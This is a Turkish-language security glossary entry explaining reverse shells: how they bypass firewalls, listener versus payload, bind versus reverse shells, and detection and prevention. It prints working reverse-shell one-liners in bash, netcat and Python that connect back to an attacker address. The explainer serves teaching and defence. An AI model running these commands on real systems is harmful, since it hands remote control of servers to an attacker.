Ters Kabuk
Kısaca: Ters Kabuk
Ters kabuk, aynı zamanda geri bağlanma kabuğu olarak da bilinir, bir sistemin saldırganla bağlantı kurarak onlara canlı bir komut satırı oturumu vermesi durumudur.
Neden önemlidir?
- Ters kabuklar güvenlik duvarlarını aşabilir çünkü çoğu güvenlik duvarı gelen bağlantıları engeller ancak gidenleri izin verir.
- Saldırganlar gerçek kontrol elde eder çünkü doğrudan oturum açmış gibi komut çalıştırabilirler.
- Ters kabuklar çok yaygındır çünkü bir saldırganın bir sistemi istismar ettikten sonra standart bir adımdır.
Bunu şu şekilde hayal edin: Saldırgan içeri girmeye çalışmak yerine, sunucuyu kendilerine ulaşması için kandırırlar.
Ters Kabuk Nedir?
Ters kabuk, kurbanın bilgisayarının saldırganın bilgisayarına bağlantı başlattığı bir uzaktan kabuktur.
Normalde, bilgisayarınız bir bağlantı başlatır, örneğin bir web sitesini ziyaret ettiğinizde. Ters kabukta, bu tersine çevrilir. Saldırgan bir şekilde kod çalıştırmayı başardıktan sonra, sunucu saldırgana geri bağlanır.
Bunu hatırlamanın kolay bir yolu:
- Bağlantı kabuğu: Sunucuya bağlanmaya çalışırsınız. Eğer bir güvenlik duvarı sizi engellerse, geçemezsiniz.
- Ters kabuk: Sunucu size bağlanır. Giden bağlantılar genellikle izin verildiğinden, cevap verebilir ve kontrolü ele alabilirsiniz.
Ters Kabukların Önemi
Güvenlik ekipleri genellikle güvenlik duvarları, yük dengeleyiciler ve portları sınırlama gibi savunmalara odaklanır. Bunlar, bir saldırgan sistem içinde kod çalıştırmayı başarana kadar işe yarar.
Bu olduğunda, ters kabuk saldırganın içeride kalmasının ana yolu haline gelir.
Neden bu tehlikeli:
-
Giden trafik güvenilir kabul edilir.
Güvenlik duvarları, güncellemeler ve API’ler için genellikle 80 veya 443 gibi portlarda giden trafiğe izin verir. Ters kabuklar bu izin verilen trafikte gizlenebilir.
-
Saldırganlar erişimi sürdürebilir.
Orijinal güvenlik açığı kapatılsa bile, aktif bir kabuk saldırganların sistemi kontrol etmesine olanak tanıyabilir.
-
Yanal hareketi mümkün kılar.
Bir kabuk ile saldırganlar iç ağı inceleyebilir, parolaları çalabilir ve diğer bilgisayarlara geçebilir. Bir güvenlik açığı hızla tüm ortamın tehlikeye girmesine yol açabilir.
Ters Kabuk Nasıl Çalışır
Bir ters kabuk iki ana parçadan oluşur: dinleyici ve yük.
1. Dinleyici (Saldırgan Tarafı)
Saldırgan, bağlantıları bekleyen bir program kullanır. Netcat bu iş için yaygın bir araçtır.
nc -lvnp 4444Bu komut, saldırganın bilgisayarına 4444 portunda dinleme yapmasını ve bir bağlantı beklemesini söyler.
2. Yük (Kurban Tarafı)
Uzaktan Kod Yürütme gibi bir güvenlik açığı bulduktan sonra, saldırgan kurbanın sunucusunda bir kabuk açmak ve geri göndermek için bir komut çalıştırır.
bash -i >& /dev/tcp/saldırgan-ip/4444 0>&1Bu komut, bir bash kabuğu başlatır ve tüm giriş ve çıkışı saldırganın bilgisayarına gönderir.
3. Bağlantı
Kurbanın sunucusu giden bir bağlantı başlatır. Güvenlik duvarı bunu normal olarak görür ve izin verir. Saldırganın dinleyicisi bağlantıyı kabul eder ve saldırgana sunucuda canlı bir kabuk sağlar.
Bu aşamada, saldırgan sunucu üzerinde tam etkileşimli kontrol elde eder.
Yaygın Ters Kabuk Örnekleri
Saldırganlar ve etik hackerlar, hedef sistemde mevcut olan araçlara göre yaklaşımlarını ayarlarlar.
Bash (Linux’ta Yaygın)
bash -i >& /dev/tcp/10.0.0.1/4444 0>&1Netcat
Netcat hedef makinede mevcut olduğunda kullanılır.
nc -e /bin/sh 10.0.0.1 4444Python
Python modern sunucularda çok yaygındır.
python -c 'import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.0.0.1",4444));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
subprocess.call(["/bin/sh","-i"]);'Ters Kabuk vs Bağlantı Kabuk
Ters kabuklar ve bağlantı kabukları arasındaki farkı bilmek, ağları savunmada yardımcı olur.
| Özellik | Bağlantı Kabuk | Ters Kabuk |
|---|---|---|
| Bağlantı yönü | Saldırgan’dan Kurban’a | Kurban’dan Saldırgan’a |
| Güvenlik duvarı etkisi | Genellikle engellenir | Genellikle izin verilir |
| Ağ gereksinimleri | Doğrudan erişim gerekli | NAT ve güvenlik duvarları üzerinden çalışır |
| Tipik kullanım durumu | İç ağlar | Gerçek dünya saldırıları |
Ters Kabukları Kim Kullanır?
- Penetrasyon testçileri, bir güvenlik açığının tam sistem ele geçirmeye yol açabileceğini kanıtlamak için ters kabuklar kullanır.
- Kırmızı ekipler, giden trafiğin ne kadar iyi kontrol edildiğini test etmek için ters kabuklar kullanır.
- Kötü niyetli aktörler, fidye yazılımı dağıtmak, veri çalmak veya bir ağa daha fazla sızmak için ters kabuklar kullanır.
- Sistem yöneticileri nadiren uzaktan erişim için ters kabuklar kullanır. Genellikle güvenli SSH tünellerini tercih ederler.
Tespit ve Önleme
Ters kabukları durdurmak birkaç katmanlı savunma gerektirir.
-
Giden trafik filtreleme
Sunucuların internete açık erişimi olmamalıdır. Kullanabilecekleri hedefleri ve portları sınırlayın.
-
Davranış izleme
Bir web sunucusunun /bin/bash veya cmd.exe gibi bir kabuk işlemi başlatması son derece şüphelidir.
-
Saldırı yüzeyini azaltın.
Üretim sistemlerinden Netcat, derleyiciler ve ekstra yorumlayıcılar gibi kullanılmayan araçları kaldırın.
İlgili Terimler
- Uzaktan Kod Yürütme (RCE)
- Bağlı Kabuk
SSS: Ters Kabuk
Ters kabuk yasa dışı mı?
Ters kabuklar yalnızca sahip olduğunuz veya test etmek için açık izniniz olan sistemlerde kullanıldığında yasaldır. İzin olmadan kullanmak yasa dışıdır.
Güvenlik duvarları neden ters kabuklara izin verir?
Güvenlik duvarları gelen tehditleri engellemek için inşa edilmiştir ve genellikle giden trafiğe güvenir. Ters kabuklar bundan yararlanır.
Bir antivirüs ters kabukları tespit edebilir mi?
Bazen. İmza kullanan antivirüs yazılımları bilinen kabuk programlarını bulabilir, ancak Bash veya Python ile yapılan dosyasız kabukları tespit etmek çok daha zordur.
Ters kabuk ile web kabuğu arasındaki fark nedir?
Web kabuğu bir tarayıcı üzerinden kullanılır ve genellikle sistemde kalır, ancak sınırlı özelliklere sahiptir. Ters kabuk ise canlı, etkileşimli bir komut satırı oturumu sağlar.